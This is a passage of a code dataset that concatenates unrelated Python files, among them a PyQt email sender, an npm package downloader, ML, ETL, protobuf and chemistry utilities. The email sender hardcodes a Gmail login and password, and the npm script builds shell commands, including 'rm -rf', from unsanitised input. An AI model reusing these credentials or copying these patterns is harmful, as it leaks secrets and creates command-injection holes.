rgb(255,255,255);\"\r\n \"color:black;\"\r\n \"text-align: center;\"\r\n \"border: 1px solid rgb(0, 0, 0);\" )\r\n # -----------------------\r\n addr_from = \"testovicht12@gmail.com\"\r\n addr_to = self.textbox.text()\r\n password = \"testovicht12123\"\r\n msg = MIMEMultipart()\r\n # -----------------------\r\n msg[ 'From' ] = addr_from\r\n msg[ 'To' ] = 
addr_to\r\n msg[ 'Subject' ] = 'Сообщение с приложения!'\r\n # -----------------------\r\n body = self.holder_for_text[ -1 ]\r\n msg.attach( MIMEText( body , 'plain' ) )\r\n server = smtplib.SMTP( 'smtp.gmail.com' , 587 )\r\n # -----------------------\r\n server.starttls()\r\n server.login( addr_from , password )\r\n server.send_message( msg )\r\n server.quit()\r\n # -----------------------\r\n message_for_user = QMessageBox( self )\r\n message_for_user.setWindowTitle( \"Успешная отправка\" )\r\n message_for_user.setText( \"Сообщение успешно отправлено \" )\r\n message_for_user.setIcon( QMessageBox.Information )\r\n\r\n message_for_user.setStandardButtons( QMessageBox.Cancel | QMessageBox.Ok )\r\n message_for_user.setDefaultButton( QMessageBox.Ok )\r\n\r\n message_for_user.setDetailedText(\r\n \"Вы можете просмотерть все отправленные сообщнеия в дополнительной вкладке , в основном меню\" )\r\n message_for_user.setInformativeText(\r\n \"Сообщение было отправленно на почту : \" + self.textbox.text() + '.Пожалуйста,перепроверьте почту.' )\r\n x = message_for_user.exec_()\r\n holder = (addr_to , body , datetime.datetime.now())\r\n # print( holder )\r\n self.cur.execute( \"SELECT * FROM sended_emails;\" )\r\n # print( self.cur.fetchall() )\r\n self.cur.execute( \"INSERT INTO sended_emails VALUES (?,?,?);\" , holder )\r\n self.conn.commit()\r\n\r\n def change_to_db_window( self ):\r\n print( \"Сработала функция изменения окна\" )\r\n\r\n self.window_2.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n ex = QApplication( sys.argv )\r\n app = App()\r\n sys.exit( ex.exec_() )\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"201615688","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport os\nimport sys\n\ndef makePackageDir():\n try:\n packages_path = os.path.join(\".\", \"packages\")\n os.system(\"rm -rf {}\".format(packages_path))\n os.mkdir(packages_path)\n except:\n pass\n\ndef getCacheDir():\n return os.path.join(os.environ[\"HOME\"], \".npm\")\n\ndef cleanCache():\n print(\"[+] Clearing local npm cache\")\n os.system(\"rm -rf {}\".format(os.path.join(getCacheDir(), \"*\")))\n\ndef installPackage(package):\n if os.path.exists(package):\n with open(package) as f:\n packages = f.read().split(\"\\n\")[::-1]\n for p in packages:\n if p != \"\":\n print(\"[+] Installing {}...\".format(p))\n os.system(\"npm install {}\".format(p))\n else:\n print(\"[+] Installing {}...\".format(p))\n os.system(\"npm install {}\".format(package))\n\ndef generateProgetPackage():\n print(\"[+] Copying packages to ./packages\")\n for root, dirs, files in os.walk(getCacheDir()):\n for f in files:\n if \"package.tgz\" == f:\n package_file = os.path.join(root, f)\n dest_file = os.path.join(\".\",\"packages\", \"{}-{}.tgz\".format(os.path.basename(os.path.dirname(root)), os.path.basename(root)))\n cmd = \"cp {} {}\".format(package_file, dest_file)\n os.system(cmd)\n\nif __name__ == \"__main__\":\n makePackageDir()\n cleanCache()\n installPackage(sys.argv[1])\n\n if len(sys.argv) == 3 and sys.argv[2] == \"dev\":\n generateDevPackage()\n else:\n generateProgetPackage()\n\n cleanCache()\n\n","sub_path":"old_version/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"482331361","text":"\"\"\"\nThis script is the main file that calls 
all the other\nscripts to run the ml project.\n\"\"\"\n\nimport pandas as pd\nimport src.config as sc\n\nfrom sklearn import model_selection\nfrom src.model_dispatcher import model\nfrom src.param_grid import parameter_grid\n\n\ndef run_output(df):\n \"\"\"\n Run a grid search over the parameter grid on the\n training data and print the best score and parameters.\n\n Args:\n df (pd.DataFrame): training dataset\n\n Returns:\n clf (GridSearchCV): the fitted grid search object\n \"\"\"\n features = [i for i in df.columns if i != 'price_range']\n X = df[features].values\n y = df['price_range'].values\n\n \"\"\"\n We could also use RandomizedSearchCV, which randomly samples\n parameter combinations and cross-validates them; it takes less\n time than grid search because not every combination is trained.\n Its extra parameter n_iter controls the trade-off: a small\n n_iter takes less time than grid search, a large one more.\n \"\"\"\n clf = model_selection.GridSearchCV(\n estimator=model,\n param_grid=parameter_grid,\n scoring='accuracy',\n verbose=10, # a higher value just means more information will be printed\n n_jobs=1,\n cv=5\n )\n\n \"\"\"fit model on the training data\"\"\"\n clf.fit(X, y)\n\n print(f'Best score is : {clf.best_score_}')\n best_parameters = clf.best_estimator_.get_params()\n print('Best Parameters Set:')\n for prm in parameter_grid.keys():\n print(f'\\t {prm} : {best_parameters[prm]}')\n\n return clf\n\n\nif __name__ == '__main__':\n df = pd.read_csv(sc.TRAINING_FILE)\n run_output(df)\n","sub_path":"run_main.py","file_name":"run_main.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"632449096","text":"\nfrom config import Config\nimport json\nfrom tools import MySQLDB, Encoder, CantorishInitBaseDeltaUpdater\nfrom queries import queryMap\nimport logging\nimport logging.handlers\nimport os,sys\nimport getopt\n\nscript_path = os.path.dirname(os.path.abspath(__file__))\nenv = 'default'\nconfig_file = script_path+'/simple.cfg'\nrange = 64\nbatch_size = 1000\n\nopts, args = getopt.getopt(sys.argv[1:], 'e:c:i:p:t:b:r:', ['env=', 'conf=', 'batch_size=', 'range='])\n\nfor k, v in opts:\n if k in (\"-e\", \"--env\"):\n env = v\n elif k in (\"-c\", \"--conf\"):\n config_file = v\n elif k in (\"-b\", \"--batch_size\"):\n batch_size = int(v)\n elif k in (\"-r\", \"--range\"):\n range = int(v)\n\nlogger = logging.getLogger('etl_cantorish')\nlogger.setLevel(logging.INFO)\nLOG_FILENAME = \"/tmp/etl.cantorish_init_base.%s.delta.log\"%env\nhandler = logging.handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=100000000, backupCount=5)\nhandler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))\nlogger.addHandler(handler)\n\npid = str(os.getpid())\npidfile = \"/tmp/etl.cantorish_init_base.%s.delta.pid\"%env\n\nif os.path.isfile(pidfile):\n logger.warn( \"%s already exists, exiting\" % pidfile )\n sys.exit()\n\nfile(pidfile, 'w').write(pid)\n\ntry:\n cfg = Config(file(config_file))[env]\n db_source = MySQLDB(cfg['db']['source'])\n db_target = MySQLDB(cfg['db']['management'])\n deltaUpdater = CantorishInitBaseDeltaUpdater(db_source, db_target, queryMap, range)\n deltaUpdater.streamDelta(batch_size)\n \n db_source.close()\n db_target.close()\nexcept:\n logger.error(\"exception: %s\"%str(sys.exc_info()))\n raise \nfinally:\n 
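# always remove the pid lockfile, even after an exception, so the next run is not blocked\n 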
os.unlink(pidfile)\n\n","sub_path":"cantorish/init_base_delta.py","file_name":"init_base_delta.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"233120018","text":"import sys\ndigits = '0123456789.'\noperators = '+-*'\nparens = '()'\n\n\"\"\"\nParses a list of tokens EXPLST, returning a tuple where the first element is\nit's evaluation.\n\"\"\"\ndef parse(explst):\n first = explst[0]\n rest = explst[1:]\n if first == '(':\n left, newlist = parse(rest)\n operator = newlist[0]\n right, toss = parse(newlist[1:])\n return eval(left, operator, right), toss[1:]\n return first, rest\n\n\"\"\"\nTakes numerical types L and R and applies function that OPERATOR represents\n\"\"\"\ndef eval(l, operator, r):\n left = float(l)\n right = float(r)\n if operator == '+':\n return left + right\n elif operator == '-':\n return left - right\n elif operator == '*':\n return left * right\n else:\n print(\"ERROR, invalid op: \" + operator)\n exit()\n\n\"\"\"\nReceives a parenthesized arithmetic expression LINE and returns it's evaluation.\n\"\"\"\ndef driver(line):\n holder = []\n cleaned = line.replace(' ', '')\n for c in cleaned:\n if c in parens or c in operators:\n holder.append(c)\n elif c in digits:\n if len(holder) == 0 or not (holder[-1][0] in digits):\n holder.append(c)\n else:\n holder[-1] = holder[-1] + c\n else:\n return \"Invalid Input: \" + line\n\n try:\n return parse(holder)[0]\n except IndexError:\n return \"Invalid Input: \" + line\n\n\ndef main():\n for i in range(1, len(sys.argv)):\n print(driver(sys.argv[i]))\n print(\"\\nExample Tests: \")\n print(\"Input: '(521+3)' ... Expected: 524 ... Got: \" + str(driver(\"(521+3)\")))\n print(\"Input: '(4-2)' ... Expected: 2 ... Got: \" + str(driver(\"(4-2)\")))\n print(\"Input: '((4-2)+(3*2))' ... Expected: 8 ... Got: \" + str(driver(\"((4-2)+(3*2))\")))\n print(\"Input: '((1+(3*2))-4)' ... Expected: 3 ... Got: \" + str(driver(\"((1+(3*2))-4)\")))\n print(\"Input: '3' ... Expected: 3 ... Got: \" + str(driver(\"3\")))\n print(\"Input: '(5.6+2.4)' ... Expected: 8 ... 
Got: \" + str(driver(\"(5.6+2.4)\")))\n print(str(driver(\"(6)\")))\n print(driver('bill'))\n print(driver('(bill-bill)'))\n\nif __name__== \"__main__\":\n main()\n","sub_path":"funcparse.py","file_name":"funcparse.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"290218558","text":"# IBiS 410 - Problem Set 3 - Problem 5\n#\n# Jonathan Strutz\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Use only top strand of hairpin\ndna_seq = 'GGCCCGCCGCAATATTAATT'\n\n# Import table as dictionary\nbp_deltaG = {'AA': 1.68, 'AC': 2.42, 'AG': 2.19, 'AT': 1.42,\n 'CA': 2.42, 'CC': 3.00, 'CG': 3.68, 'CT': 2.19,\n 'GA': 2.12, 'GC': 3.75, 'GG': 3.00, 'GT': 2.42,\n 'TA': 0.97, 'TC': 2.12, 'TG': 2.42, 'TT': 1.68}\n\n# Calculate deltaG\ndeltaG = 0\ndeltaG_cum_list = []\nfor double_bp in [dna_seq[i] + dna_seq[i+1] for i in range(len(dna_seq) - 1)]:\n deltaG += bp_deltaG[double_bp]\n deltaG_cum_list.append(deltaG)\nprint('\\nGibbs Free Energy:', deltaG, 'kT')\n\n# Calculate Force in pN\n# Recall that 1 kBT/nm = 4.114 pN\n# Assume 1 nm / bp (why I divide by length of the sequence minus one)\nforce = deltaG / (len(dna_seq) - 1) * 4.114\nprint('Force:', round(force, 2), 'pN')\n\n# Calculate Free Energy with Force\nfree_energy_list = []\nfor index, deltaG in enumerate(deltaG_cum_list):\n free_energy_list.append(deltaG - force * (index + 1) / 4.114)\n\n# Plot free energy as a function of number of base pairs opened\nplt.plot(range(0, len(dna_seq)), [0] + free_energy_list)\nplt.title('Free Energy for Force as we Open the Hairpin', size=16)\nplt.xlabel('n (number of base pairs opened)')\nplt.xlim([0, 20])\nplt.xticks(range(0, 20))\nplt.ylabel('Free Energy (k_B*T)')\nplt.ylim([0, 10])\nplt.savefig('HW3_5b')\n\n# Part C - Find switching time (assume R = 19 bp = 5.7 nm)\n# Using formula tau = tau' * exp(deltaG / kT) where tau' = R^2 / D\n# Calculate switch time in seconds\nswitch_time = 6 * np.pi * 10**-3 * 5.7**3 / (4 * 10**-21 * 10**27) * np.exp(9)\nprint('Switching Time:', round(1000 * switch_time, 2), 'ms\\n')\n","sub_path":"HW3/HW3_5.py","file_name":"HW3_5.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"97849546","text":"#!/usr/bin/python\n# encoding=utf-8\n\"\"\"\n配置文件\n\"\"\"\n\nimport os\nimport subprocess\nfrom util import Util\n\nclass ExeRsp(object):\n def __init__(self):\n self.returncode = 0\n self.stderr = ''\n\nclass OneDes(object):\n \"\"\"\n 一行proto的注释信息\n \"\"\"\n def __init__(self):\n # 举例:optional bool purchased = 2; //是否可出售\n self.type = '' # 类型\n self.name = '' # 名称\n self.idx = '0' # 在proto里的索引\n self.des = '' # 注释\n self.flag = 0 # 标记:0-普通;1-枚举(enum)头;2-类(message)头\n\nclass Config(object):\n def __init__(self):\n self.table_path = './../table/'\n self.proto_path = './../proto/'\n self.enable_add_des = True # 是否添加注释\n self.use_auto_svn = False # 是否使用AutoSVN,使用则会自动提交cs和data文件\n self.use_tortoise_svn = True # 是否使用TortoiseSVN工具,使用则会在执行命令前先更新一次\n self.tortoise_svn_update_path = './../' # 更新路径\n\n self.client_table_prefix = 'c_table_' # 客户端表格二进制文件前缀\n self.server_table_prefix = 's_table_' # 服务端表格二进制文件前缀\n self.common_prefix = 'common_' # 公共库文件前缀\n self.command_prefix = 'command_' # 命令文件前缀\n\n self.client_table_package = 'Table' # 客户端表格包名\n self.server_table_package = 'table' # 服务端表格包名\n \n self.table_cs_path = './../output/table_cs/' # 表格CS文件存储相对路径\n self.table_data_path = 
'./../output/table_data/' # 表格二进制文件存储相对路径\n self.common_cs_path = './../output/common_cs/' # 公共proto的CS文件存储相对路径\n self.command_cs_path = './../output/command_cs/' # 协议proto的CS文件存储相对路径\n\n self.copy_to_unity = True # 是否拷贝Unity需要的文件到Unity工程\n self.unity_table_cs_path = './../../Assets/Scripts/Table/table_cs/' # Unity中表格CS文件存储相对路径\n self.unity_table_data_path = './../../Assets/Resources/table_data/' # Unity中表格二进制文件存储相对路径\n self.unity_common_cs_path = './../../Assets/Scripts/MSG/common_cs/' # Unity中公共PB的CS文件存储相对路径\n self.unity_command_cs_path = './../../Assets/Scripts/MSG/command_cs/' # Unity中协议PB的CS文件存储相对路径\n\n @classmethod\n def proto_to_cs(cls, proto_name, cs_path):\n \"\"\"\n 根据proto文件生成cs文件\\n\n proto_name proto文件名称,xxx.proto\\n\n cs_path 输出的cs文件路径,xxx/xxx/xxx.cs\n \"\"\"\n os.system('protogen.exe -i:' + proto_name + ' -o:' + cs_path + ' -p:detectMissing')\n\n @classmethod\n def generate_proto_py_file(cls, proto_name):\n \"\"\"\n 根据proto文件生成python文件\\n\n proto_name proto文件名称(不带后缀),xxx\n \"\"\"\n ret = Config.execute_shell_command(['protoc.exe', '-I.', '--python_out=.', '{}.proto'.format(proto_name)], 'T')\n return ret\n\n @classmethod\n def delete_xml(cls, cs_path):\n text = ''\n pattern = '[global::System.Xml.Serialization.XmlIgnore]'\n target = '//Here has been deleted XmlIgnore'\n with open(cs_path, 'r') as f:\n text = f.read()\n if text.count(pattern) > 0:\n with open(cs_path,'w') as f:\n text = text.replace(pattern, target)\n f.write(text)\n\n @classmethod\n def add_des_from_proto_to_cs(cls, proto_path, cs_path):\n \"\"\"\n 把proto文件的注释转移到cs文件\\n\n proto_path proto文件路径,xxx/xxx/xxx.proto\\n\n cs_path cs文件路径,xxx/xxx/xxx.cs\n \"\"\"\n proto_text = ''\n with open(proto_path, 'r') as f:\n proto_text = f.readlines()\n Config.split_proto(proto_text, cs_path)\n\n @classmethod\n def split_proto(cls, proto_text, cs_path):\n \"\"\"\n 把proto文件的内容进行分析,拆分enum和message块\\n\n proto_text proto文件内容\\n\n cs_path cs文件路径,xxx/xxx/xxx.cs\n \"\"\"\n if len(proto_text) <= 0:\n return\n tmp_text = [] # 寻找到的一个结构\n is_in_finding = False # 在查找中,已经找到了开始标志,在寻找结尾\n finding_type = 0 # 查找的类型:0-枚举(enum);1-结构(message)\n idx = 0 # 行数索引\n \n # 1.寻找开头标记enum和message\n for line in proto_text:\n idx = idx + 1\n if line.find('enum ') != -1:\n is_in_finding = True\n finding_type = 0\n tmp_text.append(line.strip())\n break\n elif line.find('message ') != -1: # 子模块可能含有前置空格\n is_in_finding = True\n finding_type = 1\n tmp_text.append(line.strip())\n break\n\n if is_in_finding == False:\n return\n \n # 把开头部分找过的去掉\n proto_text[0 : idx] = []\n idx = 0\n if len(proto_text) <= 0:\n return\n\n # 2.先确保找到了一个左括号\n cnt = 0 # 找到的左括号数量\n for line in proto_text:\n idx = idx + 1\n tmp_text.append(line)\n if line.find('{') != -1:\n cnt = 1\n break\n if cnt != 1:\n return\n proto_text[0 : idx] = []\n idx = 0\n if len(proto_text) <= 0:\n return\n\n # 3.找到刚好抵消的右括号\n in_sub_class = False # 找到了子模块,message可能嵌套,这里只处理下一级的嵌套,下二级的给下一级处理\n sub_class_left_brackets_cnt = -1 # 子模块左括号数量\n sub_class_idx = 0 # 子模块出现时候的idx\n for line in proto_text:\n idx = idx + 1\n \n if in_sub_class is True:\n if sub_class_left_brackets_cnt == -1:\n if line.find('{') != -1:\n sub_class_left_brackets_cnt = 1\n else:\n if line.find('{') != -1:\n sub_class_left_brackets_cnt = sub_class_left_brackets_cnt + 1\n elif line.find('}') != -1:\n sub_class_left_brackets_cnt = sub_class_left_brackets_cnt - 1\n if sub_class_left_brackets_cnt == 0:\n in_sub_class = False\n sub_class_text = []\n for k in range(idx - sub_class_idx):\n sub_class_text.append(proto_text[sub_class_idx + k])\n 
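# the nested message block just closed: recurse so its fields get\n # their own pass through split_proto\n 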
Config.split_proto(sub_class_text, cs_path)\n continue\n \n # 只有非子模块时才看message,保证只看一级的\n if line.find('message ') != -1:\n in_sub_class = True\n sub_class_idx = idx - 1 # 注意这个idx是多前进了一步的(先加的),所以减去1\n continue\n\n tmp_text.append(line)\n if line.find('{') != -1:\n cnt = cnt + 1\n if cnt == 0:\n break\n elif line.find('}') != -1:\n cnt = cnt - 1\n if cnt == 0:\n break\n\n if cnt != 0:\n return\n proto_text[0 : idx] = []\n idx = 0\n\n # 4.处理这个块\n Config.do_one_split_proto(tmp_text, cs_path, finding_type)\n\n # 5.寻找下一个块\n if len(proto_text) <= 0:\n return\n Config.split_proto(proto_text, cs_path)\n\n @classmethod\n def do_one_split_proto(cls, proto_text, cs_path, p_type):\n \"\"\"\n 分析一个完整的块,一个enum或者message\\n\n proto_text 这个完整块的的proto内容\\n\n cs_path 对应的cs文件路径\\n\n p_type 类型:0-枚举(enum);1-结构(message)\n \"\"\"\n\n des_list = [] # 这个块所有的注释内容\n line_idx = 0\n for line in proto_text:\n line_idx = line_idx + 1\n if line.find('//') != -1:\n first = Util.strip_notes_spaces_tab(line.split('//', 1)[0])\n # 这是一个纯粹的注释,不是写在字段后面的,忽略掉\n if Util.empty_str(first):\n continue\n\n oneDes = OneDes()\n # 注释和内容分离\n oneDes.des = line.split('//', 1)[1].strip()\n\n if line_idx == 1: # 第一行,类头\n oneDes.type = first.strip().split(' ', 1)[1]\n if p_type == 0:\n oneDes.flag = 1\n else:\n oneDes.flag = 2\n des_list.append(oneDes)\n continue\n\n if p_type == 0:\n oneDes.type = first.split('=', 1)[0].strip()\n else:\n first_1 = first.split('=', 1)[0].strip()\n s_list = first_1.split(' ')\n oneDes.type = s_list[1].strip()\n oneDes.name = s_list[2].strip()\n\n first_2 = first.split('=', 1)[1].strip()\n if first_2.find('[') != -1: # 枚举类型的字段有默认值\n first_2 = first_2.split('[', 1)[0].strip()\n oneDes.idx = first_2.strip(';')\n des_list.append(oneDes)\n\n if len(des_list) <= 0:\n return\n \n name_str = Util.strip_notes_spaces_tab(proto_text[0])\n\n if p_type == 0:\n name_str = 'public {}'.format(name_str)\n else:\n name_str_t = name_str.split(' ', 1)[1].strip()\n name_str = 'public partial class {} : global::ProtoBuf.IExtensible'.format(name_str_t)\n\n ############### 开始处理cs文件 ###############\n\n cs_text = '' # cs文件的内容\n with open(cs_path, 'r') as f:\n cs_text = f.readlines()\n \n idx_s = -1 # 这个类在cs文件里的第一行索引\n cnt = -1 # 当前找到的左括号数量\n\n # 寻找结构的头标志\n for line in cs_text:\n idx_s = idx_s + 1\n if line.find(name_str) != -1:\n if line.find('{') != -1:\n cnt = 1\n else:\n cnt = 0\n break\n if cnt == -1:\n return\n\n idx_s = idx_s - 1 # 退一行,描述头在类的前一行\n idx_t = -1 # 这个类在cs文件里最后一行的索引\n first = True # 还需要找第一个左括号\n if cnt == 1:\n first = False\n \n for line in cs_text:\n idx_t = idx_t + 1\n if idx_t < idx_s:\n continue\n \n if line.find('{') != -1:\n cnt = cnt + 1\n first = False\n if first == False and line.find('}') != -1: # 生成的文件,可能左右括号在一行\n cnt = cnt - 1\n\n # 每一行尝试查找注释\n cs_text[idx_t] = Config.try_add_des(des_list, p_type, line)\n \n if cnt == 0 and first == False:\n break\n with open(cs_path, 'w') as f:\n f.writelines(cs_text)\n \n @classmethod\n def try_add_des(cls, des_list, p_type, val):\n \"\"\"\n 尝试增加注释\n \"\"\"\n if len(val.strip()) <= 0:\n return val\n \n if p_type == 0:\n for oneDes in des_list:\n if oneDes.flag == 0:\n if val.find('[global::ProtoBuf.ProtoEnum(Name=@\"{}\", Value='.format(oneDes.type)) != -1:\n des_str = ' /// \\n /// {}\\n /// \\n'.format(oneDes.des)\n return des_str + val\n else:\n if val.find('[global::ProtoBuf.ProtoContract(Name=@\"{}\")]'.format(oneDes.type)) != -1:\n des_str = ' /// \\n /// {}\\n /// \\n'.format(oneDes.des)\n return des_str + val\n else:\n for oneDes in des_list:\n if oneDes.flag == 0:\n 
n_key = ' /// \\n /// {}\\n /// \\n'.format(oneDes.des)\n f_key = '[global::ProtoBuf.ProtoMember({}, '.format(oneDes.idx)\n if val.find(f_key) != -1:\n return n_key + val\n else:\n if val.find('[global::System.Serializable, global::ProtoBuf.ProtoContract(Name=@\"{0}\")]'.format(oneDes.type)) != -1:\n des_str = ' /// \\n /// {}\\n /// \\n'.format(oneDes.des)\n return des_str + val\n\n return val\n\n @classmethod\n def execute_shell_command(cls, args, wait = 'T'):\n ret = ExeRsp()\n p = subprocess.Popen(args, stderr=subprocess.PIPE)\n if wait == 'T':\n ret.returncode = p.wait()\n ret.stderr = p.stderr.read()\n return ret\n else:\n ret.returncode = 0\n return ret","sub_path":"table/tools/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":13416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"641862356","text":"from datetime import datetime\nfrom enum import Enum\n\n\nclass TicketRequest(object):\n def __init__(self, req_id, transporter, departure, arrival, date, from_time, to_time):\n self.id = req_id\n self.transporter = transporter\n self.departure = departure\n self.arrival = arrival\n self.date = date\n self.from_time = from_time\n self.to_time = to_time\n\n\nclass TicketResponse(object):\n def __init__(self, datetime, seats):\n self.datetime = datetime\n self.seats = seats\n\n def __repr__(self):\n return f'Datetime: {str(self.datetime)}, Free seats - {self.seats}'\n\n\nclass User(object):\n def __init__(self,\n user_id,\n username,\n first_name,\n last_name,\n is_bot,\n language_code,\n visit_datetime):\n self.id = user_id\n self.username = username\n self.first_name = first_name\n self.last_name = last_name\n self.is_bot = is_bot\n self.language_code = language_code\n self.visit_datetime = visit_datetime\n\n @classmethod\n def from_dict(cls, data):\n return cls(\n user_id=data['id'],\n username='@' + data['username'],\n first_name=data['first_name'],\n last_name=data['last_name'],\n is_bot=data['is_bot'],\n language_code=data['language_code'],\n visit_datetime=datetime.now()\n )\n\n def asdict(self):\n return {\n 'user_id': self.id,\n 'username': self.username,\n 'first_name': self.first_name,\n 'last_name': self.last_name,\n 'is_bot': self.is_bot,\n 'language_code': self.language_code,\n 'visit_datetime': str(self.visit_datetime)\n }\n\n\nclass RequestStatus(Enum):\n created = 'CREATED'\n in_progress = 'IN PROGRESS'\n closed = 'CLOSED'\n\n\nclass Request(object):\n def __init__(self,\n request_id,\n user_id,\n transporter,\n departure,\n arrival,\n required_date,\n from_time,\n to_time,\n status,\n created_at,\n closed_at):\n self.id = request_id\n self.user_id = user_id\n self.transporter = transporter\n self.departure = departure\n self.arrival = arrival\n self.required_date = required_date\n self.from_time = from_time\n self.to_time = to_time\n self.status = status\n self.created_at = created_at\n self.closed_at = closed_at\n\n @classmethod\n def from_dict(cls, data):\n from utils import str_to_datetime\n required_date = datetime.combine(data['required_date'], datetime.min.time())\n return cls(\n request_id=data['request_id'],\n user_id=data['user_id'],\n transporter=data['transporter'],\n departure=data['departure'],\n arrival=data['arrival'],\n required_date=required_date,\n from_time=str_to_datetime(required_date, data['from_time']),\n to_time=str_to_datetime(required_date, data['to_time']),\n status=data['status'],\n created_at=data['created_at'],\n closed_at=data['closed_at']\n )\n\n def 
asdict(self):\n return {\n 'request_id': self.id,\n 'user_id': self.user_id,\n 'transporter': self.transporter,\n 'departure': self.departure,\n 'arrival': self.arrival,\n 'required_date': str(self.required_date),\n 'from_time': self.from_time.strftime(\"%H:%M\"),\n 'to_time': self.to_time.strftime(\"%H:%M\"),\n 'status': self.status.value,\n 'created_at': str(self.created_at),\n 'closed_at': str(self.closed_at),\n }\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"352567626","text":"from __future__ import annotations\n\nimport os\n\nfrom pymatgen.analysis.chemenv.connectivity.environment_nodes import EnvironmentNode\nfrom pymatgen.util.testing import PymatgenTest\n\ntry:\n import bson\nexcept ModuleNotFoundError:\n bson = None # type: ignore\n\n__author__ = \"waroquiers\"\n\njson_files_dir = os.path.join(\n PymatgenTest.TEST_FILES_DIR,\n \"chemenv\",\n \"json_test_files\",\n)\n\n\nclass EnvironmentNodesTest(PymatgenTest):\n def test_equal(self):\n s = self.get_structure(\"SiO2\")\n en = EnvironmentNode(central_site=s[0], i_central_site=0, ce_symbol=\"T:4\")\n\n en1 = EnvironmentNode(central_site=s[2], i_central_site=0, ce_symbol=\"T:4\")\n assert en == en1\n assert not en.everything_equal(en1)\n\n en2 = EnvironmentNode(central_site=s[0], i_central_site=3, ce_symbol=\"T:4\")\n assert en != en2\n assert not en.everything_equal(en2)\n\n en3 = EnvironmentNode(central_site=s[0], i_central_site=0, ce_symbol=\"O:6\")\n assert en == en3\n assert not en.everything_equal(en3)\n\n en4 = EnvironmentNode(central_site=s[0], i_central_site=0, ce_symbol=\"T:4\")\n assert en == en4\n assert en.everything_equal(en4)\n\n def test_as_dict(self):\n s = self.get_structure(\"SiO2\")\n en = EnvironmentNode(central_site=s[2], i_central_site=2, ce_symbol=\"T:4\")\n\n en_from_dict = EnvironmentNode.from_dict(en.as_dict())\n assert en.everything_equal(en_from_dict)\n\n if bson is not None:\n bson_data = bson.BSON.encode(en.as_dict())\n en_from_bson = EnvironmentNode.from_dict(bson_data.decode())\n assert en.everything_equal(en_from_bson)\n\n def test_str(self):\n s = self.get_structure(\"SiO2\")\n en = EnvironmentNode(central_site=s[2], i_central_site=2, ce_symbol=\"T:4\")\n assert str(en) == \"Node #2 Si (T:4)\"\n\n\nif __name__ == \"__main__\":\n import unittest\n\n unittest.main()\n","sub_path":"pymatgen/analysis/chemenv/connectivity/tests/test_environment_nodes.py","file_name":"test_environment_nodes.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"294348920","text":"# LIBRERIAS\nimport numpy as np\nimport cv2\nfrom time import sleep\nimport picamera\nimport funciones as fun\n#inicializacion de variables\n# acomodacion de camara\n#camera.start_preview()\n#sleep(1)\n#camera.stop_preview()\n#<<<<<<<<<<<<<<<<<< inicio calibracion >>>>>>>>>>>>>>>>>\ninp='';\nwhile(inp.upper()!='Y'):\n i=1\n name='cal1.jpg'\n# camera.capture(name,0)\n Im= cv2.imread(name)\n# cv2.imshow('imagen',Im)\n gray=cv2.cvtColor(Im,cv2.COLOR_BGR2GRAY);\n warp=fun.encuadre(gray,Im)\n (war,(xf,yf))=fun.calibracion(Im)\n #cv2.imshow('CAL',war)\n cv2.waitKey(0);\n print(xf)\n print(yf)\n\n #inp=input('la cuadricula esta bien ubicada? 
y/n ')\n inp='y'\n cv2.destroyAllWindows()\n#<<<<<<<<<<<<<<<<<< fin calibracion >>>>>>>>>>>>>>>>> \n\nprint('/----------------------/')\nprint(xf)\nprint(yf)\nprint('/----------------------/')\n\n#<<<<<<<<<<<<<<<<<< reconocimiento >>>>>>>>>>>>>>>>>\n# nececesito umbral adaptativo\nreina=cv2.imread('imagenes/reina.png',0)\n(w,h)=reina.shape\ninp='';\ni=2\nMIN_MATCH_COUNT=10\n#surf=cv2.xfeatures2d.SURF_create(400)\n#kp1, des1=surf.detectAndCompute(reina,None)\n#print (len(kp1))\n\n#img2=cv2.drawKeypoints(reina,kp1,None,(0,200,0),4)\n#cv2.imshow('fg',img2)\nname='rec1.jpg'\n ## camera.capture(name,0)\nIm= cv2.imread(name)\ncv2.imshow('imagen',Im)\ngray=cv2.cvtColor(Im,cv2.COLOR_BGR2GRAY)\nwarp=fun.encuadre(gray,Im)\ngrw=cv2.cvtColor(warp,cv2.COLOR_BGR2GRAY)\n#thresh de otsu\nret,th=cv2.threshold(grw,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\ncv2.imshow('h',th)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\nfor i in range(0,8):\n for j in range(0,8):\n name='tile'+str(i)+'-'+str(j)+'.jpg'\n Cp=th[xf[i]+17:xf[i+1]+17,yf[j]-18:yf[j+1]-18]\n Im= cv2.imwrite(name,Cp)\n print(name)\n \n\n","sub_path":"tesis/test/cutim.py","file_name":"cutim.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"635107965","text":"#-*- coding:utf-8 -*-\n\nimport os\n\nimport sys\nimport tornado\nfrom tornado import concurrent\nfrom libs.apsCron import 